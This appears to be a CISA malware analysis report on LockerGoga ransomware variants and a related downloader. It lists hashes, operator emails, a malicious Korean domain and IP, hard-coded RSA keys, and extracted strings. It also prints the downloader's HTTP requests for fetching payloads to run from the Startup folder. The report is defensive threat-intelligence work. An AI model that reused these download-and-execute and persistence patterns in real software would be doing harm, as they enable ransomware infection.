Malware Analysis Report (AR20-133F)

MAR-10238137-1.v2

 

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

None

The Cybersecurity and Infrastructure Security Agency (CISA) acquired a downloader and multiple samples of the ransomware family known as LockerGoga for analysis. This report provides detailed analysis for three variants of the LockerGoga ransomware. The first variant, identified with a compile date of January 2019 attempts to encrypt targeted files on the compromised system. The second variant, identified with a compile date of early March 2019, encrypts targeted files and attempts to shut down Windows System services. The third variant, identified with a compile date of mid-March 2019 encrypts targeted files, attempts to shuts down Windows System services, and attempts to enumerate account names on the compromised system and change the password to the account.

To encrypt the target files, all LockerGoga variants generate 32-bytes of pseudo-random data, which is used as Advanced Encryption Standard (AES) key / initialization vector (IV) values. A hard-coded public Rivest, Shamir, and Adelman (RSA) key is used to secure/encrypt the 32-bytes of AES key data. The AES key data is appended to the bottom of each targeted file that is encrypted in the public RSA key. A different AES key / IV value will be generated for the files the ransomware encrypts. In addition, all LockerGoga variants use a multi processing framework to encrypt the targeted files. This multi processing feature is facilitated utilizing the Boost C++ framework. During the encryption processes, dozens or hundreds of different LockerGoga processes will be spawned. The ransomware places a file on the user's desktop of the compromised system named “README_LOCKED.txt,” which provides instructions on how to decrypt the files.

The first variant includes the following samples:
5b0b972713cd8611b04e4673676cdff70345ac7301b2c23173cdfeaff564225c
8cfbd38855d2d6033847142fdfa74710b796daf465ab94216fbbbe85971aee29
f3c58f6de17d2ef3e894c09bc68c0afcce23254916c182e44056db3cad710192
bdf36127817413f625d2625d3133760af724d6ad2410bea7297ddc116abc268f
c3d334cb7f6007c9ebee1a68c4f3f72eac9b3c102461d39f2a0a4b32a053843a
6e69548b1ae61d951452b65db15716a5ee2f9373be05011e897c61118c239a77

The second variant includes the following samples:
eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0
ba15c27f26265f4b063b65654e9d7c248d0d651919fafb68cb4765d1e057f93f
7bcd69b3085126f7e97406889f78ab74e87230c11812b79406d723a80c08dd26

The third variant includes the following samples:
c97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15
88d149f3e47dc337695d76da52b25660e3a454768af0d7e59c913995af496a0f

For a downloadable copy of IOCs, see MAR-10238137-1.v2.stix.

Emails (12)

AbbsChevis[@]protonmail.com

AsuxidOruraep1999[@]o2.pl

CottleAkela[@]protonmail.com

DharmaParrack[@]protonmail.com

IjuqodiSunovib98[@]o2.pl

MayarChenot[@]protonmail.com

QicifomuEjijika[@]o2.pl

QyavauZehyco1994[@]o2.pl

RezawyreEdipi1998[@]o2.pl

SayanWalsworth96[@]protonmail.com

SuzuMcpherson[@]protonmail.com

wyattpettigrew8922555[@]mail.com

Submitted Files (14)

0a960dd9c015545c2fe4d4f39bae6f9e7af1afb1933900f105c5ae9ec51a446d (0a960dd9c015545c2fe4d4f39bae6f...)

5b0b972713cd8611b04e4673676cdff70345ac7301b2c23173cdfeaff564225c (5b0b972713cd8611b04e4673676cdf...)

6e69548b1ae61d951452b65db15716a5ee2f9373be05011e897c61118c239a77 (6e69548b1ae61d951452b65db15716...)

7bcd69b3085126f7e97406889f78ab74e87230c11812b79406d723a80c08dd26 (7bcd69b3085126f7e97406889f78ab...)

88d149f3e47dc337695d76da52b25660e3a454768af0d7e59c913995af496a0f (88d149f3e47dc337695d76da52b256...)

8cfbd38855d2d6033847142fdfa74710b796daf465ab94216fbbbe85971aee29 (8cfbd38855d2d6033847142fdfa747...)

ba15c27f26265f4b063b65654e9d7c248d0d651919fafb68cb4765d1e057f93f (ba15c27f26265f4b063b65654e9d7c...)

bdf36127817413f625d2625d3133760af724d6ad2410bea7297ddc116abc268f (bdf36127817413f625d2625d313376...)

bef41d3c76aa98e774ca0185eb5d37da7bf128e3d855ebc699fed90f3988c7d3 (bef41d3c76aa98e774ca0185eb5d37...)

c3d334cb7f6007c9ebee1a68c4f3f72eac9b3c102461d39f2a0a4b32a053843a (c3d334cb7f6007c9ebee1a68c4f3f7...)

c97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15 (c97d9bbc80b573bdeeda3812f4d00e...)

ec52b27743056ef6182bc58d639f477f9aab645722f8707300231fd13a4aa51f (ec52b27743056ef6182bc58d639f47...)

eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0 (eda26a1cd80aac1c42cdbba9af813d...)

f3c58f6de17d2ef3e894c09bc68c0afcce23254916c182e44056db3cad710192 (f3c58f6de17d2ef3e894c09bc68c0a...)

Domains (1)

inhyunits.co.kr

IPs (1)

211.115.206.121

Findings

0a960dd9c015545c2fe4d4f39bae6f9e7af1afb1933900f105c5ae9ec51a446d

Tags

CVE-2017-8759downloaderransomwaretrojan

Details
Name 0a960dd9c015545c2fe4d4f39bae6f9e7af1afb1933900f105c5ae9ec51a446d
Size 389632 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 d2f637c8054b7d31ae0230b0e18016f6
SHA1 56ca6afc91cca17e2c2423f0d196979bf2f70b1f
SHA256 0a960dd9c015545c2fe4d4f39bae6f9e7af1afb1933900f105c5ae9ec51a446d
SHA512 db006723279f8d4e43f3798d5ad83301d76f7deef5ff3bcee9363fd3dbb191efbe356035ec5f91f68b31939ac2ac393ec8496406cbe219e0a0f74ec7cdb992ed
ssdeep 1536:x4Pud954WSDZ5sjHkTTmcJzRa+WNJ6EFk9vjtBF6JzRa+WNJ6EFk9vjtBFL:x4Pe95v2BTmc3I6SwZBg3I6SwZBZ
Entropy 4.797588
Antivirus
Ahnlab Trojan/Win32.Hwdoor
Antiy Trojan/Win32.Agentb
Avira EXP/W97M.CVE-2017-8759.xxwrs
BitDefender Trojan.GenericKD.41129073
ClamAV Win.Ransomware.LockerGoga-7008188-0
ESET Win32/TrojanDownloader.Agent.EMK trojan
Emsisoft Trojan.GenericKD.41129073 (B)
Ikarus Exploit.2
K7 Trojan ( 003e58dd1 )
McAfee RDN/Generic.ego
NANOAV Trojan.Win32.Dwn.folwni
Symantec Downloader
TACHYON Trojan-Downloader/W32.Agent.389632.U
TrendMicro TROJ_DN.E18E869D
TrendMicro House Call TROJ_DN.E18E869D
VirusBlokAda BScope.Trojan.Agentb
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-03-17 05:33:02-04:00
Import Hash 70b3ccd6172dcfd0ebf7eac46b4a26ae
PE Sections
MD5 Name Raw Size Entropy
edc2f175286b6382705f008d19d6c36e header 1024 2.444022
9fa13e1ad07729207352b58a2015ddd3 .text 26112 6.382131
1ef60b36e19f1aa5d02f1f08d54fe1fd .rdata 11264 4.904405
40a16a84fd0b58c2b8b458f8f3b56d9e .data 3072 2.671540
adbf74eb294a67f6f2261c11f1c5d6f2 .rsrc 343040 4.535774
3472951a5e9449d21a6b4f33b31fcc95 .reloc 5120 3.254207
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
0a960dd9c0... Connected_To inhyunits.co.kr
Description

This application is a malicious PE32 executable designed to download and execute payloads on the victim's system. When executed, it creates a mutex named "f396t9sjh9439y" and xor decodes the below strings:

--Begin strings--
/bbs/adm/img/camp/vcasi.php
\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
"\Start Menu\Programs\Startup\"
inhyunits.co.kr/bbs/icon/ritian.php?yishi=1
inhyunits.co.kr/bbs/icon/yiqi.tar
--End strings--

It contains the below hexadecimal encoded file name strings:

--Begin file name strings--
iCloud.exe
sample.jpg
--End file name strings--

During runtime, it attempts to download and install a payload from a web site in Korea using the below URI:

--Begin URI--
inhyunits.co.kr/bbs/icon/ritian.php?yishi=1
--End URI--

Displayed below is the GET request:

--Begin GET request--
GET /bbs/icon/ritian.php?yishi=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: inhyunits.co.kr
Cache-Control: no-cache
--End GET request--

The payload was not available for analysis. Analysis indicates that the response payload will be validated (the first two bytes must be "0x18 0xDA" ) and xor decoded. The decoded payload is installed and executed from "%AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iCloud.exe".

It also attempts to download and install another payload using the below GET request:

--Begin GET request--
GET /bbs/icon/yiqi.tar HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: inhyunits.co.kr
Cache-Control: no-cache
--End GET request--

The payload was not available for analysis. Analysis indicates that the response payload is installed and executed from "%AppData%\Local\Temp\sample.jpg".

88d149f3e47dc337695d76da52b25660e3a454768af0d7e59c913995af496a0f

Tags

ransomwaretrojan

Details
Name 88d149f3e47dc337695d76da52b25660e3a454768af0d7e59c913995af496a0f
Size 1268600 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 c2da604a2a469b1075e20c5a52ad3317
SHA1 442ed0cac2abe062d8e630f3ece803af687751db
SHA256 88d149f3e47dc337695d76da52b25660e3a454768af0d7e59c913995af496a0f
SHA512 966aec9c149646cf22675e82459a88ac0ae8b187714e05d1c1401149e69e1c1b71f06ac878982a19d1feda667772915c0ff15dab92e326752b001e20f240560b
ssdeep 24576:645Rt4El7fc/TFJzjJUgrrCq5sNIwQsUGy1q49DlIACTp+kqGslRG:Rjt4El7fc/TFJWstwQsPdsDuACTpqhG
Entropy 6.409640
Antivirus
AegisLab Trojan.Win32.Crypren.tpXh
Ahnlab Win-Trojan/Alisa.Exp
Antiy Trojan[Ransom]/Win32.Crypren
Avira TR/AD.LockerGaga.wxqlr
BitDefender Trojan.GenericKD.31807201
ClamAV Win.Ransomware.Lockergoga-6918486-0
Cyren W32/LockerGoga.C.gen!Eldorado
ESET a variant of Win32/Filecoder.LockerGoga.D trojan
Emsisoft MalCert.A (A)
Ikarus Trojan-Ransom.LockerGoga
K7 Trojan ( 00549a691 )
McAfee Ransom-Goga!C2DA604A2A46
Microsoft Security Essentials Ransom:Win32/LockerGoga
NANOAV Trojan.Win32.Crypren.fofbon
Quick Heal TrojanRansom.Crypren
Sophos Troj/Ransom-FHW
Symantec Ransom.GoGalocker
TACHYON Ransom/W32.LockerGoga.1268600
TrendMicro Ransom.6989548C
TrendMicro House Call Ransom.6989548C
Vir.IT eXplorer Trojan.Win32.Encoder.BJD
VirusBlokAda TrojanRansom.Crypren
YARA Rules

No matches found.

ssdeep Matches
99 c97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15
PE Metadata
Compile Date 2019-03-18 05:07:54-04:00
Import Hash ce51c671c94cce6379a0f6823fad4112
Company Name ALISA LTD
File Description Background Tasks Host
Internal Name tgytutrc
Legal Copyright Copyright (C) ALISA LTD 2019
Original Filename tgytutrc
Product Name Service tgytutrc
Product Version 1.5.1.0
PE Sections
MD5 Name Raw Size Entropy
fef81ff280f7970a0e8c5fb7cf72ccc8 header 1024 3.137939
d2cece39d6a77b83a83f293a258e0539 .text 950784 6.394510
e9cf132ec4ae53fd577acd75d0f2f2fd .rdata 215040 5.005741
7875cbf4a0d2bf8dcfc3e8050d9155d7 .data 36864 4.906004
989c5454046d063763761caf32d530cc .rsrc 1536 3.713257
baeab56fc43111e778df3bb41ed018c4 .reloc 58368 6.554867
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
88d149f3e4... Related_To DharmaParrack[@]protonmail.com
88d149f3e4... Related_To wyattpettigrew8922555[@]mail.com
Description

This file is a Windows 32-bit executable identified as the third variant of LockerGoga. It encrypts the targeted files, attempts to shut down Windows System services, and attempts to change the user account passwords on the compromised system.

Screenshots
Screen_Shot_2019-03-31_at_9.27.04_AM.png -

Screen_Shot_2019-03-31_at_9.27.04_AM.png -

Screen_Shot_2019-03-31_at_9.30.50_AM.png -

Screen_Shot_2019-03-31_at_9.30.50_AM.png -

Screen_Shot_2019-03-31_at_9.35.48_AM.png -

Screen_Shot_2019-03-31_at_9.35.48_AM.png -

8cfbd38855d2d6033847142fdfa74710b796daf465ab94216fbbbe85971aee29

Tags

ransomwaretrojan

Details
Name 8cfbd38855d2d6033847142fdfa74710b796daf465ab94216fbbbe85971aee29
Size 1282576 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 164f72dfb729ca1e15f99d456b7cf811
SHA1 f92339e73c7e901c0c852d8e65615cfb588a4ff6
SHA256 8cfbd38855d2d6033847142fdfa74710b796daf465ab94216fbbbe85971aee29
SHA512 9fb1314230df3ffec2dc2add2dd2450eddffcb981b0742875b876162318c55921bcd737b18b2bf6157f2a30a7fe69d271ded0db517cfb233e9d37e37b3a66b7f
ssdeep 24576:Kla7NCRgrdZ3+0qC3iQx+iE89W++aHGX4vju0zU7KwQCBzSyn9RwAoS:KYxSU393kiE8KRXGuV7KwQCBzSQwAoS
Entropy 6.590504
Antivirus
AegisLab Trojan.Win32.Crypren.tpVm
Ahnlab Trojan/Win32.FileCoder
Antiy Trojan[Ransom]/Win32.Crypren
Avira TR/AD.LockerGaga.ujeuv
BitDefender Trojan.GenericKD.31581882
ClamAV Win.Ransomware.Lockergoga-6900587-0
Cyren W32/LockerGoga.A.gen!Eldorado
ESET Win32/Filecoder.LockerGoga.A trojan
Emsisoft Trojan.GenericKD.31581882 (B)
Ikarus Trojan-Ransom.LockerGoga
K7 Trojan ( 005470f61 )
McAfee Trojan-Ransom.b
Microsoft Security Essentials Ransom:Win32/LockerGoga
NANOAV Trojan.Win32.Encoder.fmmfaf
NetGate Trojan.Win32.Malware
Quick Heal Ransom.LockerGoga.S5239812
Sophos Troj/Ransom-FFO
Symantec Ransom.GoGalocker
TrendMicro Ransom.8F9672D2
TrendMicro House Call Ransom.8F9672D2
Vir.IT eXplorer Trojan.Win32.Encoder.BNYU
VirusBlokAda Trojan.Encoder
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-01-16 14:27:26-05:00
Import Hash 9f0af3709985725a166977d6f89a4b0e
Company Name Mlcrosoft
File Description Host Process for Windows Services
Internal Name worker32
Legal Copyright Copyright (C) 2019
Original Filename worker32
Product Name Service Worker
Product Version 1.0.2.0
PE Sections
MD5 Name Raw Size Entropy
79dfac702f6564322eb8eddff1e5a4b4 header 1024 2.906923
897ab3c9781dbb3aac161c845868f55a .text 942592 6.616388
39b6d47d0b7f223fa760dadc76bbf3da .rdata 228864 4.918639
c9f5cd50e9dd7e08029d8c8a855728ef .data 42496 4.943752
99e49d99f4d82e78d24c456d8c37acb7 .rsrc 1536 3.646307
005b349ad468258ccdc68b74335df934 .reloc 62464 6.566553
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
8cfbd38855... Related_To AbbsChevis[@]protonmail.com
8cfbd38855... Related_To IjuqodiSunovib98[@]o2.pl
Description

This file is a Windows 32-bit executable identified as the first variant of LockerGoga. It encrypts targeted files.

eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0

Tags

trojan

Details
Name eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0
Size 1254264 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 16bcc3b7f32c41e7c7222bf37fe39fe6
SHA1 a25bc5442c86bdeb0dec6583f0e80e241745fb73
SHA256 eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0
SHA512 f3e7087f569b3bcc201c006c5dfcea6cf560cad480bc03e6f17790190bc35bf6659e91a9f91219952bd139a3c9afde961032ee1d0861158409206feaa6540f9e
ssdeep 24576:uj/6CtkHRos9l+zan4Q6eQqF5ZgQibE2zkMiJHic9OuTw258tox6T9G0SKoRl:A/NtkHRos9l+zan4QTB/2zkPtBq2itoP
Entropy 6.637733
Antivirus
Ahnlab Win-Trojan/Alisa.Exp
Antiy Trojan[Ransom]/Win32.Agent
Avira TR/AD.LockerGaga.kevou
BitDefender Trojan.Agent.DRBC
Cyren W32/LockerGoga.C.gen!Eldorado
ESET a variant of Win32/Filecoder.LockerGoga.C trojan
Emsisoft MalCert.A (A)
Filseclab Trojan.DOMG.lvlk
Ikarus Trojan-Ransom.LockerGoga
K7 Riskware ( 0040eff71 )
McAfee Ransom-Goga!16BCC3B7F32C
Microsoft Security Essentials Ransom:Win32/LockerGoga
NANOAV Trojan.Win32.Encoder.fnvvpk
NetGate Trojan.Win32.Malware
Quick Heal Trojan.Multi
Sophos Troj/Ransom-FHW
Symantec Ransom.GoGalocker
TACHYON Ransom/W32.LockerGoga.1254264
TrendMicro Ransom.8F9672D2
TrendMicro House Call Ransom.8F9672D2
Vir.IT eXplorer Trojan.Win32.Encoder.BIP
VirusBlokAda TrojanRansom.Agent
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-03-02 14:41:12-05:00
Import Hash 5ac063140bb65ee6bf5852bb45b1e9b6
Company Name ALISA LTD
File Description Background Tasks Host
Internal Name yxugwjud
Legal Copyright Copyright (C) ALISA LTD 2019
Original Filename yxugwjud
Product Name Service yxugwjud
Product Version 1.3.2.0
PE Sections
MD5 Name Raw Size Entropy
8116d3096e3e367224cffef102f3e74b header 1024 3.078292
c02f7c6bf4d062bd558381654551164d .text 935936 6.661819
4178579bb7208b5a8df95933f622fb9a .rdata 215040 5.005001
83122215ddac73fe4bf67170fff8de8b .data 37376 4.985918
bfef6df0df70950ab096fd2fa132da52 .rsrc 1536 3.736642
9e0d1711fa1b3b00ca61328f1e35f210 .reloc 58368 6.553686
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
eda26a1cd8... Related_To SuzuMcpherson[@]protonmail.com
eda26a1cd8... Related_To AsuxidOruraep1999[@]o2.pl
Description

This file was identified as the second variant of LockerGoga, which encrypts the targeted files and attempts to shut down Windows System services. The hard-coded RSA keys differ between the second variant samples. Displayed below are the RSA keys for the second variant samples:

--Begin Second Variant SHA256 Hashes and RSA Keys--

-------------------------------------------------------------------------------------------
eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0

MIGdMA0GCSqGSIb3DQEBAQUAA4GLADCBhwKBgQD4ZArmcis7vWav4PzdrEvWW2aWI++jYuDz BLI1OZv0SrEO3KoaPMj1cXV6a+GHdnjdiPUprU0dodJW7CagV/89WI72RZdVRYPVXNKoKtUz FM16KiguwKZ6ZY/ZdQCgLtwrZ/2r2KJmazrkctlQsz6WCcCETOM1ohdrvzzWjOzhYwIBEQ==

-------------------------------------------------------------------------------------------
ba15c27f26265f4b063b65654e9d7c248d0d651919fafb68cb4765d1e057f93f

MIGdMA0GCSqGSIb3DQEBAQUAA4GLADCBhwKBgQDCba/W2jLTbVRJEtaasoTTmlt1ZnmX/2OT 6//hgvqePHKsO/z4fP2+wAffmAjQHGK2dAZ+HN7cxlbDXywi+s/k5XWgo3Fg0gAjfJBhMe5T x+LIfDEcs+R+TUfUYZX8SBh/0ksF7DnGPtojoq9NrV/cNR7ZcIlcM/ITOfHEZWSDDwIBEQ==

-------------------------------------------------------------------------------------------
7bcd69b3085126f7e97406889f78ab74e87230c11812b79406d723a80c08dd26

MIGdMA0GCSqGSIb3DQEBAQUAA4GLADCBhwKBgQC9dR7jfOdn8AZTi0plXQRQKHWJAxLlykYr 9V4ZMXLJ9d9kmyHUoKturoTYNZZisiW5ncP6/2YtG5ezGSXnQXUQtZTAnVesTalNvLyd6tBe t81p8mxflulX99T2WKubEnc2OR0Yj2a6EJppt2IVx6H/BiF7G3Z2z4qg/tsXBant4wIBEQ==

-- End Second Variant SHA256 Hashes and RSA Keys --

Before encrypting files, the malware imports the Windows library “Rstrtmgr.dll” and uses functions exported via this Windows dynamic link library (DLL) to find applications and services registered with the Windows Restart Manager on the compromised system. The malware will attempt to disable important system services and possibly target services responsible for running anti-virus and security software. This would provide the malware a higher probability of being able to encrypt as many files as possible before being identified and stopped by network security software.

Strings of interest from this variant of LockerGoga are displayed below:

--Begin Strings of Interest--

lgorithmParametersBase: parameter "
InputBuffer
Log2Base
DecodingLookupArray
InsertLineBreaks
MaxLineLength
Global\SM-yxugwjud
\([xX]86\)
.lnk
\.(do[ct][xb]?|wbk|xlm|xlsx|xltx|xlsb|xlw|pp[ts]|pot|p[op][st]x|sldx|pdf|db|sql)
Rstrtmgr.dll
RmStartSession
RmRegisterResources
RmGetList
started
timeout
unknown exception $
unknown exception
exiting
finished
scan finised
c:/.log
warming up...
/w:
cipher.exe
done.
.cmd
del
timeout 3
del
master:
unknown exception
.exe
yxugwjud
move
cmd.exe
SeDebugPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeLockMemoryPrivilege
SeCreateGlobalPrivilege
options
log
log,l
master
master,m
slave
slave,s
ipc
ipc,i
invalid map<K, T> key
OutputStringPointer
StringSink: OutputStringPointer not specified
Unflushable<T>: this object has buffered input that cannot be flushed
vector<T> too long
BufferedTransformation: this object doesn't allow input
AllocatorBase: requested size would cause integer overflow
get_next_capacity, allocator's max size reached
vector<bool> too long
invalid string position
NtSetInformationFile
NtQuerySystemInformation
NtQueryObject
NtQuerySemaphore
NtQuerySection
NtOpenFile
NtClose
NtQueryTimerResolution
QueryPerformanceCounter
QueryPerformanceFrequency
ntdll.dll
: this object doesn't support resynchronization
StreamTransformation: this object doesn't support random access
RandomNumberGenerator: IncorporateEntropy not implemented
CryptoMaterial: this object contains invalid values
CryptoMaterial: this object does not support precomputation
AES
RC6
FeedbackSize
EncodingParameters
CipherModeBase: feedback size cannot be specified for this cipher mode
CTR
CBC
SHA-1
MGF1
RSA
internal error
NtReadFile
NtWriteFile
RtlInitUnicodeString
RtlFreeUnicodeString
MIGdMA0GCSqGSIb3DQEBAQUAA4GLADCBhwKBgQD4ZArmcis7vWav4PzdrEvWW2aWI++jYuDz BLI1OZv0SrEO3KoaPMj1cXV6a+GHdnjdiPUprU0dodJW7CagV/89WI72RZdVRYPVXNKoKtUz FM16KiguwKZ6ZY/ZdQCgLtwrZ/2r2KJmazrkctlQsz6WCcCETOM1ohdrvzzWjOzhYwIBEQ==
.locked
\??\\
FAILED
exception:
SuzuMcpherson[@]protonmail.com
AsuxidOruraep1999[@]o2.pl
README_LOCKED.txt
OAEP-
roscTKwrSJIojJmpnKZXdSfwxy0G7ZVouxnAnTQylqffQ9Ge7UdVL0p3Qft1CfyN7O0gH071 dbEF0Aimo6+qQklkQrQIrxuIuz3cuCg5xK3Ry9bKz8/7mirLDAOLdoxIhYHmxJzskAXXnTYk JwKWrbQRUZUnDTbZiUGjcQlJWCYs7lKv1MLs/q5nN0uqma1Y+G1LSXFR2svJJMy6cnbt3lmL xglZupMHv7LnkqDwFPg5SJ4CtPHzUz92OV9lG0OyIyfUh0DZflfr1PQbMYwlf6Ocus9EUrTT 2tHLu9n6BdbJE1sFpZjnFlbSlb73wb1PJawjBBjvHPzusZLeTbx6aK+K4wp0ZcJcNzFtFzzb H5Whl6n20JOZnHNVQGeBE0KmyxZcPXsRETMHJ3pEFoG6N6I+MyvUNbhxgOZr3/mjuf3MMQMZ PKvvfLkAV/Hgw4zeu+pIausNIoubG//CIyIfWvAHcyzmU6Gys96Q8BmgV7xlwxTpCwe6uKtV Dsx1u+NHqFiClZZCkYgkTodxxaMtaXwfzKdTbL7EF1odi9JnG9MwOYVBcQq9cHG/rv/QyU7g LdnLuMKI68i2/FDkh+RtKsy1b800KVuXjpSxvQacbNygLQ6OFuww4RrZn3+1UKSgWr3R7AEI PQ9J0V7QC9qaGUlQ+tbOb2MQNaNDEW4Ip1N4hAJVMlBfG5H9ZUwcv14D8dUSSgwbJuEPO10X 7Zw8klsW3CP9o3y3LnG1h+zGuRDME+7Sss9It+xC7qIdsBpPQKeemqDHqM0Ua44sR03j73d0 ffItBTWqwFbrwXoP9+It7gwlqI0A/0QkGg7/UfjBX5FnrAowdm9UHBzS162VhBLoabs1rVif BrhYWEHOnkcco/nPDroFtIgTn2pWOmTm21HRJ35TXpKrgVeniS7/fxsq6K42YWzS0SnqMDy5 sGewrnqG0LKBejlKsxUF6tsJYyRszs/JeIjrxs1gdZM8PfewqOjBUM5X0FexCeMF98auz49D 68pF58a8l+7uEyY47qZadkF4nvdrWKRNebVz96FnS29qrjl70X0ZMW20ekoVFSedQS6VqSAz mLm2oGgPepbuD7mjJcrO5bbg6zHAF5JyQ88SjE3SkOmOgPo8/0z2rDrwIiUWmejzUrRrZ2Xy sSIf3k8+rZisY1KUmD5A5FXE5JU/KkkgSlYDYOQeiKQNFz19yrfqUdSt2jUb4GxlgfYEaK56 Mu2CIRPwPGj/ugs+Apvnj2PebrCRYic9os5wnFp7Pt7n4ajMJFPSBHStm0f9dkZahDG4llYQ kF1Q8FLML+1UsRq+a41O8aRZg/A603pMbH9+sIKTecqNU7pGDrjMZm29dxxV7casZ9majyrR mmzYGXN3/vhXh78xV1WaRRGXyDDtikGXp/x9JgCNzu92s9fRZFz1T120t4TJwabzq8amFdSo aWQeI0d666yhkDIfHodBXLee8n7QAOhlHWFaC38Yh9Kg6cLeDF45Q+K/pTgiFAMgVPUX82nj PxkPGMY9+I1L+Fgw4T6Das7bLMEIiyltvX1JY3Avf346Ov94Guis1LNXLXCLaBEOm1g4LAzE aIOkWj8fpgXKMa1ubPrUnscY5K2poA+UMkKYRVNSl0eh9nrzcMf6qFZ6ZeIab/NSitoTKQQh XKRjy1ovNA052FWgBiRKCjxqlU3ThaEtdjFCjs9mxKdg2GSL+bRBkGKIuvNdFo7K40CPd6BK yDmrux2gkqXxOwfTNhVFN3wyyNKsS2ySA5o1SQAraLP2Wwfu51ycoPyVehR5tgWYZnYHUjF1 6sN0tm+8xqLqtZy+yg68HNO02JsJ/N2w9vcOhf0PjQpYUf8Kq3Gb5fnu
p D

--End Strings of Interest--

Screenshots
Screen_Shot_2019-03-31_at_10.06.59_AM.png -

Screen_Shot_2019-03-31_at_10.06.59_AM.png -

Screen_Shot_2019-04-01_at_2.31.49_PM.png -

Screen_Shot_2019-04-01_at_2.31.49_PM.png -

Figure 3 -

Figure 3 -

Figure 4 -

Figure 4 -